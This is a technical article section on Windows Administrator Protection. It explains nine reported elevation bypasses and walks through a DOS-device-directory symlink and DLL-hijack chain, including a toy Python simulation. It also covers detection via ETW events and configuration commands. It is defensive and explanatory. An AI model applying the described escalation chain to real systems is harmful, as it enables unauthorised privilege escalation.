Identification-level impersonation: the impersonation level (`SecurityIdentification`) at which an impersonating thread can read security information about the impersonated token -- the SID set, the privilege set -- but cannot perform privileged operations or open kernel objects as the impersonated user. The kernel allows access checks to consult an identification-level token for *reading* the security information; certain code paths inadvertently use that information for *granting* operations, which is the structural primitive Forshaw's lazy DOS device directory exploit depends on [@forshaw-pz-jan2026].

The SECURITY_IMPERSONATION_LEVEL enumeration in winnt.h defines four levels in ascending order: SecurityAnonymous (value 0), SecurityIdentification (1), SecurityImpersonation (2), SecurityDelegation (3). SecurityIdentification is the second-lowest -- it sits one above SecurityAnonymous -- and is the level Windows uses when it wants to ask the kernel "what would this token be allowed to do?" without actually doing the operation. The trap is when a code path that runs as the caller uses an identification-level impersonation to read a token property -- here, the linked-token field -- and the resulting object inherits the caller's owner SID rather than the impersonated token's.
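
The ordering of the four levels can be made concrete with a short sketch. The Python below mirrors the enumeration values listed above and separates "may inspect the token" from "may act as the client". The two helper functions are hypothetical names invented for illustration; the real checks live in the kernel and are considerably more involved.

```python
from enum import IntEnum


class ImpersonationLevel(IntEnum):
    """Mirrors the SECURITY_IMPERSONATION_LEVEL values from winnt.h."""
    ANONYMOUS = 0
    IDENTIFICATION = 1
    IMPERSONATION = 2
    DELEGATION = 3


def can_query_identity(level: ImpersonationLevel) -> bool:
    # Hypothetical helper: identification level and above expose the
    # token's SIDs and privileges for inspection.
    return level >= ImpersonationLevel.IDENTIFICATION


def can_act_as_client(level: ImpersonationLevel) -> bool:
    # Hypothetical helper: only impersonation level and above let a
    # server open objects as the impersonated user.
    return level >= ImpersonationLevel.IMPERSONATION


if __name__ == "__main__":
    for level in ImpersonationLevel:
        print(level.name, can_query_identity(level), can_act_as_client(level))
```

The gap between the two predicates at `IDENTIFICATION` is the whole point: a code path that treats "can read" as "can act" at that level is the kind of confusion the exploit leans on.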

The exploit chain. An attacker running as the primary user (filtered token, Medium integrity) starts an elevation. Before the SMAA process touches its DOS device directory, the attacker impersonates the SMAA's TokenLinkedToken at identification level and triggers a code path that walks the directory. The kernel creates \Sessions\0\DosDevices\<SMAA_LUID> lazily; in the affected code path, the owner of the new directory becomes the attacker's primary token's owner SID rather than the SMAA's.

The attacker plants a C: symbolic link inside the directory pointing at an attacker-controlled location. When the elevated SMAA process loads its DLLs, the resolution walks \Sessions\0\DosDevices\<SMAA_LUID>\C: first; the symlink redirects the load to the attacker's directory; the attacker's DLL runs in the High-integrity SMAA process [@forshaw-pz-jan2026].

sequenceDiagram
participant Att as Attacker (limited user)
participant Kern as "Kernel (SeGetTokenDeviceMap)"
participant SMAA as SMAA elevated process

Note over SMAA: Fresh logon session -- DOS device dir not yet created
Att->>Att: Impersonate SMAA TokenLinkedToken at Identification level
Att->>Kern: Reference \Sessions\0\DosDevices\<SMAA_LUID>
Kern->>Kern: Lazy-create directory
Note over Kern: Owner SID taken from the attacker's primary token
Att->>Kern: Create C: symlink under attacker control
SMAA->>Kern: Resolve C: at first DLL load
Kern-->>SMAA: Returns attacker symlink target
SMAA->>SMAA: Load attacker DLL at High integrity

What makes this bypass extraordinary is that it is caused by the feature's design. Pre-Administrator-Protection, the user's primary logon session was created at desktop logon and the DOS device directory existed before any elevation. Lazy directory creation never came up. The SMAA design's "fresh logon session per elevation" property -- the same property Forshaw's January 2026 pull-quote in §7 establishes via the credential-less LSA logon -- is exactly the precondition the lazy-creation path exploits.

Microsoft's pre-GA fix has two parts. First, the manifest-parsing access check uses the SYSTEM-impersonating-the-low-user identity rather than the user's primary token. Second, the DOS device directory is materialised with the correct owner before any user-controlled code path can trigger the lazy-creation path [@forshaw-pz-jan2026]. The Register's coverage of the disclosure noted "the most notable of the nine bugs he reported was a Logon Sessions flaw that relied upon five different Windows behaviors. He added that he likely only found it because he was previously familiar with the OS's 'weird behavior when creating the DOS device object directory'" [@theregister-2026].
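
The lazy-creation race and the second half of the fix can be sketched as a toy model. The Python below is a simplification under stated assumptions, not the kernel's logic: the class and method names are hypothetical, the SIDs, LUIDs, and link targets are placeholders, and the access check is reduced to "only the directory owner may add a link".

```python
from dataclasses import dataclass, field


@dataclass
class Token:
    owner_sid: str   # owner SID stamped on objects this token creates
    logon_id: str    # logon-session LUID, used as the directory key


@dataclass
class DeviceDirectory:
    owner_sid: str
    links: dict = field(default_factory=dict)  # drive name -> target


class DeviceMapModel:
    """Toy model of per-logon-session DOS device directories."""

    def __init__(self, fixed: bool):
        self.fixed = fixed
        self.directories = {}  # logon_id -> DeviceDirectory

    def on_logon(self, token: Token) -> None:
        # Fixed behaviour: materialise the directory with the correct
        # owner before anyone can trigger lazy creation.
        if self.fixed:
            self.directories[token.logon_id] = DeviceDirectory(token.owner_sid)

    def get_device_map(self, caller: Token, impersonated: Token) -> DeviceDirectory:
        # Lazy creation on first reference. In the vulnerable model the
        # owner comes from the caller, not the impersonated token.
        directory = self.directories.get(impersonated.logon_id)
        if directory is None:
            directory = DeviceDirectory(caller.owner_sid)
            self.directories[impersonated.logon_id] = directory
        return directory

    def plant_link(self, caller: Token, logon_id: str, name: str, target: str) -> bool:
        # Simplified access check: only the owner may add entries.
        directory = self.directories[logon_id]
        if directory.owner_sid != caller.owner_sid:
            return False
        directory.links[name] = target
        return True

    def resolve(self, token: Token, name: str, global_links: dict) -> str:
        # The per-session directory is consulted before the global one.
        directory = self.directories.get(token.logon_id)
        if directory is not None and name in directory.links:
            return directory.links[name]
        return global_links[name]


GLOBAL_LINKS = {"C:": r"\Device\HarddiskVolume3"}  # placeholder target


def run_scenario(fixed: bool) -> str:
    attacker = Token(owner_sid="S-1-5-21-limited-user", logon_id="0x1111")
    smaa = Token(owner_sid="S-1-5-21-shadow-admin", logon_id="0x2222")
    model = DeviceMapModel(fixed)
    model.on_logon(smaa)
    model.get_device_map(caller=attacker, impersonated=smaa)
    model.plant_link(attacker, smaa.logon_id, "C:", r"\??\D:\attacker")
    return model.resolve(smaa, "C:", GLOBAL_LINKS)
```

Calling `run_scenario(fixed=False)` returns the attacker's link target, while `run_scenario(fixed=True)` falls through to the global mapping because the attacker never becomes the directory's owner.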

The five UI Access bypasses

Forshaw's February 2026 post details the second class, comprising five of the nine bypasses [@forshaw-pz-feb2026]. UI Access is a token flag retrofitted in Vista to let accessibility applications cross UIPI. To qualify, an executable needs three things: a manifest declaring uiAccess="true", a trusted code-signing certificate, and an installation location under an administrator-only directory (typically %ProgramFiles%). The Application Information service's RAiLaunchAdminProcess endpoint launches qualifying UI Access processes without showing the consent prompt, on the theory that the three-criteria check is itself sufficient evidence of administrator approval [@forshaw-pz-feb2026].

UI Access: the token flag (`TOKEN_UIACCESS`) that allows a process to interact with windows of higher integrity level than its own, bypassing User Interface Privilege Isolation. UI Access is meant for accessibility software (screen readers, on-screen keyboards) that needs to interact with elevated UI. To qualify, an executable must carry a `uiAccess="true"` manifest, a trusted code-signing certificate, and an administrator-only installation directory; qualifying processes run without showing the consent prompt and at integrity level High [@forshaw-pz-feb2026].
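
The three-criteria gate can be sketched as a predicate. The Python below is an illustration only: `Candidate`, `SECURE_ROOTS`, and both function names are hypothetical, the list of administrator-only roots is an assumption, and the manifest and signature results are taken as inputs rather than computed.

```python
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Assumed administrator-only roots for this sketch; the list the
# Application Information service actually uses is not reproduced here.
SECURE_ROOTS = (
    PureWindowsPath(r"C:\Program Files"),
    PureWindowsPath(r"C:\Windows\System32"),
)


@dataclass
class Candidate:
    path: str
    manifest_ui_access: bool   # manifest declares uiAccess="true"
    signature_trusted: bool    # code-signing chain verified as trusted


def is_under(path: PureWindowsPath, root: PureWindowsPath) -> bool:
    # Compare whole path components, case-insensitively, so that a
    # sibling such as "C:\Program Files Evil" does not pass as a child
    # of "C:\Program Files". This does not collapse ".." segments.
    parts = tuple(p.lower() for p in path.parts)
    root_parts = tuple(p.lower() for p in root.parts)
    return len(parts) > len(root_parts) and parts[:len(root_parts)] == root_parts


def qualifies_for_ui_access(candidate: Candidate) -> bool:
    in_secure_dir = any(
        is_under(PureWindowsPath(candidate.path), root) for root in SECURE_ROOTS
    )
    return (
        candidate.manifest_ui_access
        and candidate.signature_trusted
        and in_secure_dir
    )
```

Comparing by component rather than by string prefix is a deliberate choice in the sketch: a check that is loose about what counts as "inside" the secure directory is exactly the sort of weakness a bypass would target.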

Under classic UAC, a UI Access process ran with the filtered standard-user token bumped from Medium to High integrity -- not with the full admin token. Forshaw's February 2026 post states the mechanism verbatim: "the service will take a copy of the caller's access token, enable the UI Access flag and increase the integrity level... If the caller is a limited user of an UAC administrator it will set the integrity level to High" [@forshaw-pz-feb2026].

Under Administrator Protection, the pre-GA design preserved that behaviour unchanged: the UI Access process inherited the limited user's primary token (not the SMAA's), bumped to High integrity. That decision was the structural flaw. A High-integrity process under the limited user can interact with the SMAA's windows whenever a High-integrity SMAA process exists on the same desktop, send messages to them, read clipboard data, and -- through GetProcessHandleFromHwnd -- obtain a process handle on the SMAA process that lets the limited-user process inject code into it.

The five UI Access variants exploit different sub-categories of the same structural property. One variant targets Quick Assist, a remote assistance application on Windows 10 and 11 whose binary carries the uiAccess flag; R41N3RZUF477 published a public proof-of-concept that exploits the BrowserExecutableFolder group policy to make Quick Assist load WebView2 from an attacker-controlled directory [@quickassist-bypass]. The remaining four exploit, respectively, weaknesses in the secure-application-directory check, the manifest parsing routine, COM marshalling in UI Access contexts, and message-only window handling [@forshaw-pz-feb2026].

Microsoft's pre-GA fix is structural: UI Access processes no longer run as the limited user. They are created with a filtered copy of the SMAA's token (the SMAA's SID, the SMAA's profile, but with SeLoadDriverPrivilege and similar removed). Profile separation is restored at the cost of a more complex token-creation path [@forshaw-pz-feb2026].

The remaining three: implementation flaws

The third class -- three bypasses described by Forshaw only as "implementation flaws and long-standing UAC issues" -- is not detailed publicly [@forshaw-pz-jan2026]. The article does not invent details. Forshaw names the category and cites the framing; the engineering specifics are presumably in Microsoft Security Response Center advisories or are still under disclosure. What can be said is that two of the three appear from Forshaw's framing to be UAC-era bugs that Administrator Protection inherited rather than introduced, and one is an Administrator-Protection-specific implementation flaw.

The bypass canon ran for twenty years without bulletins. The fact that all nine pre-GA Administrator Protection bypasses received fixes -- including a deep one rooted in the feature itself -- is the structural confirmation that the elevation path is now a boundary. The next section asks why Microsoft pulled the feature in December 2025.

13. The compatibility surface and the December 2025 revert

About one month after KB5067036 made Administrator Protection available, Microsoft pulled it. Forshaw, writing in January 2026, gives the canonical attribution: "As of 1st December 2025 the Administrator Protection feature has been disabled by Microsoft while an application compatibility issue is dealt with. The issue is unlikely to be related to anything described in this blog post so the analysis doesn't change" [@forshaw-pz-jan2026]. Microsoft Learn confirms: "The feature previously listed in the October 2025 non-security update (KB5067036) has been reverted and will roll out at a later date" [@ms-admin-protection, @ms-kb5067036].

The November 2025 KB5067036 amendment is worth knowing. Microsoft included an unrelated fix for an AutoCAD MSI-repair UAC-prompt regression in the same cumulative; that fix shipped and was not reverted. The WebView2 installer regression is what caused the Administrator Protection revert specifically [@ms-kb5067036].

The structural causes. The Windows Developer Blog (May 2025) [@ms-developer-blog-2025] enumerates the surface where applications break under the SMAA model.

Single sign-on does not cross. Domain and Microsoft Entra credentials cached for the primary user's session are not available inside the SMAA's session. Any elevated process touching Microsoft Graph, Entra ID, or Kerberos-protected resources must re-authenticate. The login dialogs an elevated installer triggers are not failures of the application; they are consequences of the separated logon session.
Network drives do not carry. Drive-mapping in the primary user's session is not inherited by the SMAA. Installers that mount network shares to install per-machine components break. The workaround for affected installers is to use UNC paths directly rather than drive letters.
Library folders diverge. Files saved to Documents, Desktop, Downloads, or Pictures from an elevated app land in C:\Users\ADMIN_<random>\ rather than the primary user's home. A user clicks Save in an elevated text editor and saves to "Documents"; from their own Explorer, the file is invisible.
HKCU diverges. Application settings -- theme, recent-files lists, per-user COM registrations, last-opened paths -- live in the SMAA's HKCU, not the primary user's. The canonical example in Microsoft's documentation is Notepad's dark-mode theme [@ms-developer-blog-2025]: the primary user sets the theme; an elevated Notepad opens in the default theme; the two sessions never agree.
WebView2 installers fail. The error message "Microsoft Edge can't read and write to its data directory" is the recognisable symptom of an installer that assumes one shared profile. The WebView2 runtime stores per-user state in AppData\Local\Microsoft\EdgeWebView\ under whichever profile is active at install time; if the runtime is installed under the SMAA's profile and then used by an unelevated application running as the primary user, the data-directory write fails. This is the regression that triggered the December 2025 revert.
Hyper-V and WSL incompatibilities. Microsoft Learn explicitly tells IT administrators not to enable Administrator Protection on devices that require Hyper-V or WSL [@ms-admin-protection].
Visual Studio. Microsoft's own development environment is "not supported in such a configuration" when run elevated. Extensions don't carry; settings don't carry; project-dialog paths point at the SMAA's profile rather than the developer's actual workspace.
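
Several of the items above reduce to one fact: the same folder name resolves under two different profile roots. The Python sketch below illustrates that divergence. It assumes the default, unredirected profile layout under C:\Users; the function names and the two account names (`alice`, `ADMIN_example`) are placeholders invented for illustration.

```python
from pathlib import PureWindowsPath

USERS_ROOT = PureWindowsPath(r"C:\Users")


def known_folder(profile_name: str, folder: str) -> PureWindowsPath:
    # Simplified: assumes default, unredirected library folders.
    return USERS_ROOT / profile_name / folder


def webview2_data_dir(profile_name: str) -> PureWindowsPath:
    # Per-user WebView2 state location named in the text above.
    return USERS_ROOT / profile_name / "AppData" / "Local" / "Microsoft" / "EdgeWebView"


if __name__ == "__main__":
    for profile in ("alice", "ADMIN_example"):
        print(known_folder(profile, "Documents"))
        print(webview2_data_dir(profile))
```

An installer that computes these paths while elevated and an application that computes them while unelevated will disagree, which is the shape of both the "invisible file" and the WebView2 data-directory symptoms.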

Note: Microsoft Learn explicitly excludes Hyper-V and WSL devices from the recommended enablement set [@ms-admin-protection]. Symptoms of incorrect enablement include WSL distribution startup failures (the WSL service runs under a different account from the launching user, and the SMAA's logon-session-isolation properties interact badly with WSL's named-pipe communication) and Hyper-V Manager connection errors that are difficult to attribute to the elevation model.

I guess app compatibility is ultimately the problem here, Windows isn't designed for such a radical change. I'd have also liked to have seen this as a separate configurable mode rather than replacing admin-approval completely. -- James Forshaw, *Bypassing Windows Administrator Protection*, Google Project Zero, January 26, 2026 [@forshaw-pz-jan2026]

Administrator Protection is the right architecture, and the compatibility surface is the bill of materials for twenty years of admin-as-default assumption. Application developers have written installer logic, theme-persistence code, drive-letter assumptions, and HKCU-shared state into shipping software for two decades, on the structural premise that the elevated process and the unelevated user share a profile. The December 2025 revert is the first iteration's learning round, not a structural failure. The same revert pattern accompanied the Windows Vista UAC rollout in 2006-2007, the Windows 7 auto-elevation introduction in 2009 (which itself softened the Vista prompt fatigue at the cost of the bypass canon), and the Smart App Control rollout in Windows 11 22H2. Microsoft will re-enable Administrator Protection when the WebView2 regression and a handful of installer-pattern fixes have shipped.

The architecture survives audit. The deployment is held back by twenty years of accumulated software assumptions. The next section asks what tools defenders now have that they did not have before.

14. The audit and detection surface

Every privileged operation on a device with Administrator Protection enabled now generates an ETW (Event Tracing for Windows) event in the Microsoft-Windows-LUA provider [@ms-admin-protection]. This is the first time the elevation pipeline itself is the source of a stable, operationally useful audit trail.

The basics.

Provider: Microsoft-Windows-LUA, GUID {93c05d69-51a3-485e-877f-1806a8731346}.
Event ID 15031: Elevation Approved.
Event ID 15032: Elevation Denied or Failed.

Each event carries the caller user SID, the application name and path, the elevation outcome, the SMAA used to host the elevation, and the authentication method (Hello PIN, biometric, password) [@ms-admin-protection]. The authentication method field records the primary user's Hello credential, not the SMAA's; the SMAA's authentication in step 6 of §7 is the credential-less LSA logon and has no method field of its own. The Microsoft Learn-documented logman invocation to capture the trace is short; it is reproduced with the other commands in §16.

Microsoft-Windows-LUA: the Event Tracing for Windows provider that surfaces Administrator Protection elevation events. Provider GUID `{93c05d69-51a3-485e-877f-1806a8731346}`. Event ID 15031 marks an elevation that succeeded; Event ID 15032 marks an elevation that was denied or failed. Each event carries fields for the caller's SID, the application path, the elevation outcome, the SMAA used, and the authentication method [@ms-admin-protection].

// Sketch of a detection pipeline that reads ETW Event 15031
// (Administrator Protection elevation approved) and flags unusual
// application paths per SMAA correlation key.
// The property names on event.fields are illustrative, not a documented schema.

const allowList = new Set([
  'C:\\Windows\\System32\\mmc.exe',
  'C:\\Windows\\System32\\regedit.exe',
  'C:\\Windows\\System32\\cmd.exe',
  'C:\\Program Files\\Microsoft VS Code\\Code.exe',
]);

// Stand-in alert sink; swap in whatever alerting hook is in use.
function emit(alert) {
  console.log(JSON.stringify(alert));
}

function onEtwEvent(event) {
  // Ignore everything except approved elevations from the LUA provider.
  if (event.provider !== 'Microsoft-Windows-LUA') return;
  if (event.id !== 15031) return;

  const smaa = event.fields.shadowAccountName;
  const app = event.fields.applicationPath;
  const auth = event.fields.authenticationMethod;
  const user = event.fields.callerUserSid;

  if (!allowList.has(app)) {
    emit({
      severity: 'high',
      title: 'Unexpected elevation under Administrator Protection',
      smaa,
      app,
      auth,
      user,
      hint: 'Was the Hello prompt phished?',
    });
  }
}

Note: For detection engineers, the ADMIN_<random> name is the highest-value correlation key on the device. It is stable per primary admin (the SMAA name is created once and persists across elevations), distinct from the limited-user SID (the SMAA has its own SID, so user-by-SID correlations and SMAA-by-name correlations are independent axes), and present in every ETW 15031 / 15032 event. A detection rule that groups elevations by SMAA name and flags unexpected application paths is the canonical "someone phished a Hello prompt" alert pattern.
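
The grouping rule in the note above can be sketched in a few lines. The Python below assumes events have already been decoded into dictionaries; the keys `id`, `smaa_name`, and `application_path` are hypothetical names chosen for the sketch, not a documented event schema.

```python
from collections import defaultdict

ELEVATION_APPROVED = 15031  # Event ID for an approved elevation


def unexpected_elevations(events, allow_list):
    """Group approved elevations outside the allow-list by SMAA name."""
    # Windows paths are case-insensitive, so compare in lower case.
    allowed = {path.lower() for path in allow_list}
    flagged = defaultdict(list)
    for event in events:
        if event.get("id") != ELEVATION_APPROVED:
            continue
        app = event.get("application_path", "")
        if app.lower() not in allowed:
            flagged[event.get("smaa_name", "<unknown>")].append(app)
    return dict(flagged)
```

A result with more than one unexpected path under a single SMAA name is the cluster worth triaging first, since the SMAA name stays constant for a given primary admin.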

Defenders now have the audit trail they did not have under UAC. The next section asks what residual attack surface survives the SMAA architecture, the Hello gate, and the new audit trail.

15. Open problems: what survives

Five residual attack surfaces, each acknowledged in Microsoft's own documentation, Forshaw's Project Zero posts, or the operational literature on Windows privilege escalation.

The user is still the weak link. Every elevation depends on a human accepting the prompt. The Hello credential gate makes that human's decision more costly to fake than the classic Yes/No, but the gate does not change the fact that a successful prompt is a successful elevation. The three sub-cases of consent-without-identity-verification from §9 -- unattended-session, habituated-click, pretext click-through -- are cost-raised, not closed. Phishing-the-prompt remains a live attack surface and Microsoft does not classify it as a vulnerability [@forshaw-pz-jan2026]. Out-of-band consent -- a phone-push approval channel, a smartcard tap, a separate hardware key tap -- would close the gap; none of these is the Administrator Protection default.

Loopback authentication. The structural property that Windows services authenticate to themselves over the local network stack is independent of the SMAA model. SMB to localhost, Kerberos against the local machine account, NTLM challenge-response between processes on the same box -- these protocols predate UAC and are not changed by Administrator Protection. Forshaw's broader 2022 Kerberos research [@forshaw-2022-rbcd] catalogues the class. The NTLMless article in this series covers SMB signing, Extended Protection for Authentication (EPA), and channel binding mitigations that defenders should pair with Administrator Protection to close the loopback path.

Service-account SeImpersonatePrivilege. The Potato lineage of attacks (cataloged in the Access Control article in this series) runs in service accounts (IIS_IUSRS, LOCAL SERVICE, NETWORK SERVICE), not in interactive admin sessions. Administrator Protection scopes itself to interactive admin elevation; the Potato class is structurally out of scope.

Service-account Potato attacks run inside `IIS_IUSRS`, `LOCAL SERVICE`, and `NETWORK SERVICE` rather than in interactive admin sessions. The attacker has compromised a service that holds `SeImpersonatePrivilege`, then uses one of several primitives (the SSPI / NEGOEX dance, the EFS RPC interface, a printer-spooler endpoint) to coerce a higher-privileged service into authenticating against the attacker's local socket, and impersonates the resulting token. Administrator Protection's promise is around the *interactive elevation* path -- the flow from a logged-in user clicking an installer to an elevated process running. Potato is a separate problem class with its own mitigations: removing `SeImpersonatePrivilege` from service accounts that don't need it, applying EPA, and patching the named primitives one by one.

Driver loading once inside an SMAA elevation. Admin equals kernel applies once a process is running inside the SMAA. Vulnerable-driver loading, kernel-mode code execution, and rootkit installation fall under the §11 "admin equals kernel" ceiling -- WHQL signing, the Vulnerable Driver Blocklist, App Control for Business, and HVCI remain the four-mechanism mitigation surface, with the App Identity article in this series covering the App Control mechanism. Administrator Protection does not change the relationship between admin and kernel; it changes the relationship between standard user and admin.

The Hello credential phishing surface. The prompt now phishes a real credential rather than a click-through approval. A malicious application that successfully argues its case to the user gets a Hello gesture against the primary user's PIN or biometric. The credential remains hardware-rooted; ESS-engaged biometrics never leave the TPM or Pluton enclave; the malware does not learn the PIN. But the malware does get the elevation. The Windows Hello article in this series covers FIDO2 / ESS / PIN architecture hardening. Defender-side mitigation is the ETW 15031 / 15032 detection rule set on unexpected application paths [@ms-admin-protection].

The boundary is real, the audit trail is new, and the five-class residual surface is the next decade of work. The next section turns to operator-side practicalities.

16. Practical guide

Six tips, each tied to one Microsoft Learn or Windows Developer Blog primary source. Remember that, as of December 2025, Microsoft has reverted the rollout and the feature is currently disabled on stable Windows; the guidance below applies once Microsoft re-enables it. The verbatim commands follow the list.

Enable. Set TypeOfAdminApprovalMode = 2 via Group Policy ("User Account Control: Configure type of Admin Approval Mode" -> "Admin Approval Mode with Administrator Protection") or via the Intune Settings Catalog OMA-URI. A reboot is required for the new policy to take effect [@ms-admin-protection, @ms-kb5067036].
Verify. Run whoami in an elevated console. The account name shows ADMIN_<random>. Run whoami /groups to confirm the SMAA has the Administrators group enabled [@ms-admin-protection, @call4cloud-osint].
Capture. Start the ETW trace with the documented logman invocation; filter for Event IDs 15031 and 15032 [@ms-admin-protection]. The provider GUID is stable across builds.
Do not enable on devices that require Hyper-V or WSL. Re-evaluate when Microsoft re-enables the broad rollout [@ms-admin-protection, @forshaw-pz-jan2026].
For application developers, follow the Windows Developer Blog (May 19, 2025) guidance [@ms-developer-blog-2025]: install per-user packages unelevated; use %ProgramFiles% (and accept the elevated install path); avoid context switching during install; avoid sharing files between elevated and unelevated profiles; remove auto-elevation dependencies. The auto-elevation manifest attribute is no longer honoured under Administrator Protection, so any installer that relied on silent elevation needs to be reworked.
For IT admins on already-enabled devices broken by an elevated install: disable Administrator Protection temporarily, reinstall the application unelevated, then re-enable [@ms-developer-blog-2025].

Enable via the Group Policy registry value (elevated PowerShell console; the setting persists across reboots):

# Set TypeOfAdminApprovalMode to 2 (Admin Approval Mode with Administrator Protection)
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v TypeOfAdminApprovalMode /t REG_DWORD /d 2 /f
# Reboot required:
shutdown /r /t 0

Capture the elevation event trace:

logman start AdminProtectionTrace -p {93c05d69-51a3-485e-877f-1806a8731346} -ets
:: After some elevations:
logman stop AdminProtectionTrace -ets
:: Process the .etl with PerfView, Message Analyzer, or:
wevtutil qe Microsoft-Windows-LUA/Operational /q:"*[System[(EventID=15031 or EventID=15032)]]" /f:text
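
The XPath filter passed to wevtutil above follows a regular shape, so it can be generated rather than hand-typed when the set of Event IDs changes. The helper below is a hypothetical convenience function, not part of any Microsoft tooling; it only builds the query string.

```python
def event_id_filter(event_ids):
    """Build an XPath filter selecting the given Event IDs."""
    ids = [int(event_id) for event_id in event_ids]
    if not ids:
        raise ValueError("at least one Event ID is required")
    clause = " or ".join(f"EventID={event_id}" for event_id in ids)
    return f"*[System[({clause})]]"


if __name__ == "__main__":
    print(event_id_filter([15031, 15032]))
```

For the two Administrator Protection events the helper reproduces the filter string used in the command above.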

Verify the SMAA presence after enablement:

Get-LocalUser | Where-Object Name -like 'ADMIN_*'
# After an elevation, run from the elevated console:
whoami
# Expect: WIN11-PC\ADMIN_<random16hex>
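
A script that automates the verification step could parse the whoami output instead of relying on a visual check. The sketch below assumes the account name has the ADMIN_ prefix followed by 16 hexadecimal characters, as the expected-output comment above suggests; that format is an assumption carried over from the comment, and `parse_smaa` is a hypothetical helper.

```python
import re

# machine\ADMIN_<16 hex chars>; case-insensitive because whoami
# commonly prints names in lower case.
SMAA_ACCOUNT = re.compile(
    r"^(?P<machine>[^\\]+)\\(?P<account>ADMIN_[0-9a-f]{16})$",
    re.IGNORECASE,
)


def parse_smaa(whoami_output: str):
    """Return the SMAA account name, or None if the output is not one."""
    match = SMAA_ACCOUNT.match(whoami_output.strip())
    return match.group("account") if match else None
```

A `None` result from an elevated console is a hint that the elevation did not go through the SMAA path, or that the naming assumption does not hold on that build.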

Note: The single most common mistake in response to an Administrator Protection compatibility problem is to disable UAC globally by setting EnableLUA = 0. This returns the device to the Windows XP single-token model, removes Mandatory Integrity Control enforcement on application processes, and effectively defeats every layer of UAC and Administrator Protection together. It is universally discouraged. The correct fix is per-application, via manifest, or per-device, via the documented Administrator Protection compatibility list.
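
The policy values discussed in this section can be summarised as a small lookup. The Python below takes the values as a plain dictionary rather than reading the registry, so it runs anywhere. Treating a missing `EnableLUA` as 1 and a missing `TypeOfAdminApprovalMode` as classic Admin Approval Mode are assumptions of the sketch, and `describe_elevation_mode` is a hypothetical name.

```python
def describe_elevation_mode(policy: dict) -> str:
    """Describe the elevation posture implied by the policy values."""
    # Assumption: an absent EnableLUA value means UAC is on.
    if policy.get("EnableLUA", 1) == 0:
        return "UAC disabled (discouraged)"
    # Assumption: an absent mode value means classic Admin Approval Mode.
    mode = policy.get("TypeOfAdminApprovalMode", 1)
    if mode == 2:
        return "Admin Approval Mode with Administrator Protection"
    if mode == 1:
        return "classic Admin Approval Mode"
    return f"unrecognised TypeOfAdminApprovalMode value: {mode}"
```

Checking `EnableLUA` first reflects the warning above: once it is 0, the approval-mode value no longer matters.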

Six tips, one boundary, one operational checklist. The next section answers the most common misconceptions.

17. Frequently asked questions

No. Administrator Protection runs in `appinfo.dll` inside the Application Information service, which runs in `svchost.exe` in VTL0 (the normal Windows kernel context). The SMAA itself is a normal SAM-database account, not a Virtual Secure Mode trustlet. The cross-process protections of Virtualization-Based Security apply to LSASS Credential Guard and a handful of other VTL1 services; the elevation pipeline is not one of them. The Secure Kernel article in this series treats VTL0 / VTL1 separation in detail.

Partially. Administrator Protection replaces Admin Approval Mode UAC when `TypeOfAdminApprovalMode = 2`. The credential-prompt path (the over-the-shoulder elevation that asks a standard user to enter an administrator's credentials) and classic Admin Approval Mode (`TypeOfAdminApprovalMode = 1`) coexist with Administrator Protection across different configurations [@ms-admin-protection]. On a device with Administrator Protection enabled, only the interactive admin's elevation path goes through the SMAA; the standard-user-asking-for-admin-credentials path is unchanged.

No. There is absolutely an admin token; it lives in a different account, in a different logon session, for a bounded lifetime. The marketing language describes lifetime and isolation, not nonexistence [@ms-developer-blog-2025, @bleepingcomputer-2024]. The SMAA's token persists for the lifetime of the elevated process; when the process exits, the token handle is released and the logon session is reaped. Between elevations, no SMAA token exists in memory.

No. Malware can still elevate if the user accepts the Hello prompt. The boundary Administrator Protection creates is between *silent* elevation and *consented* elevation, not between any elevation and none. Forshaw states the position explicitly: "I expect that malware will still be able to get administrator privileges even if that's just by forcing a user to accept the elevation prompt" [@forshaw-pz-jan2026]. The three sub-cases of consent-without-identity-verification from §9 are cost-raised, not eliminated. What changes is that the elevation must be visible. Defenders gain the ETW 15031 audit trail as a result.

No. EPM uses a virtual elevated account on a per-request basis with cloud-side policy, and the virtual account is *not* a member of the local Administrators group [@ms-epm-overview]. Administrator Protection uses a persistent local SMAA per admin user, with on-box `appinfo.dll` policy, and the SMAA *is* a member of the local Administrators group [@call4cloud-osint]. EPM is centrally policy-driven and works on standard-user devices; Administrator Protection is per-device architecture and applies only to interactive admin users. The two can coexist on the same device.

No. Per Microsoft Learn, remote logon, roaming profiles, and backup admins are out of scope [@ms-admin-protection]. A domain administrator who logs into a workstation interactively will not see the SMAA path. Microsoft has stated that domain scenarios may be added in future iterations; the current GA-target form is local-machine-only, interactive-admin-only.

No. Mimikatz inside the elevated SMAA session still has `SeDebugPrivilege` and can call `OpenProcess` on `lsass.exe` to dump LSASS unless LSA Protection (Run As Protected Process Light) and Credential Guard are also enabled. Administrator Protection protects the *elevation path*; it does not protect the *resulting privileged session*. To protect the privileged session, pair Administrator Protection with LSA Protection (`RunAsPPL=1`), Credential Guard, App Control for Business, and HVCI. The Secure Kernel article in this series covers the LSA Protection mechanism.

The misconceptions are cleared. The next section returns to the opening hook with the new vocabulary the article has built.

18. The user-elevation companion to Credential Guard

Return to the two whoami /all outputs from §1, this time with the vocabulary the article has built.

The first output shows the primary user under classic UAC. One SID, one profile, one HKCU, one logon-session LUID; the elevated console is the same user as the unelevated console, distinguished only by the integrity level on the token.

The second output shows the same login under Administrator Protection. A different user name -- ADMIN_<random> -- with a different SID linked to the primary admin via ShadowAccountForwardLinkSid and ShadowAccountBackLinkSid. A different profile under C:\Users\ADMIN_<random>\. A different NTUSER.DAT mapped as HKCU. A fresh authentication-ID LUID minted by LSASS through the credential-less logon path described in §7, on the strength of appinfo.dll's trusted request and a Hello gesture the primary user just performed. An ETW Event 15031 in the Microsoft-Windows-LUA provider, freshly emitted, recording the elevation as approved, the application path, and the authentication method.

The thesis lands. The elevation path is now itself a security boundary, with bulletin-grade fixes when it fails. Administrator Protection is the user-elevation companion to Credential Guard. Where Credential Guard isolated LSA secrets from admin-equals-kernel inside the machine -- the Secure Kernel article in this series covers the VBS-rooted isolation in detail -- Administrator Protection isolates the elevation path from the standard-user session. The two answer the two halves of the question the foundational Access Control article in this series left open: if admin equals kernel and tokens are bearer credentials, what is left to harden? The answer is the path that gets you there (Administrator Protection) and the data that is there once you arrive (Credential Guard).

